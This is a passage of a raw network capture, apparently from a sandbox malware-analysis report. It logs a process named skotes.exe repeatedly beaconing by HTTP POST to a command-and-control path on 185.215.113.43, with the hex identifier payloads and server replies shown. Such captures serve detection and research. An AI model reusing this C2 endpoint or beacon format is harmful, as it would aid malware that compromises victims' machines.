                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:19.411092043 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:20.126293898 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:20 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      107192.168.2.652475185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:21.761569977 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:22.470519066 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:22 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      108192.168.2.652476185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:23.995534897 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:24.697514057 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:24 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      109192.168.2.652477185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:26.329061985 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:27.043950081 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:26 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      110192.168.2.652478185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:28.557512999 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:29.290513039 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:29 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      111192.168.2.652479185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:30.920526028 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:31.613395929 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:31 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      112192.168.2.652480185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:33.125324965 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:33.816576004 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:33 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      113192.168.2.652482185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:35.443002939 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:36.140433073 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:36 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      114192.168.2.652483185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:37.650481939 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:38.349992037 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:38 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      115192.168.2.652484185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:39.986515045 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:40.678184986 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:40 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      116192.168.2.652485185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:42.197716951 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:42.913081884 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:42 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      117192.168.2.652486185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:44.550954103 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:45.253869057 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:45 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      118192.168.2.652487185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:46.784792900 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:47.500905037 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:47 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      119192.168.2.652488185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:49.136643887 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:49.834403992 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:49 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      120192.168.2.652489185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:51.346975088 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:52.073467970 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:51 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      121192.168.2.652490185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:53.701327085 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:54.473788977 CET219INHTTP/1.1 200 OK
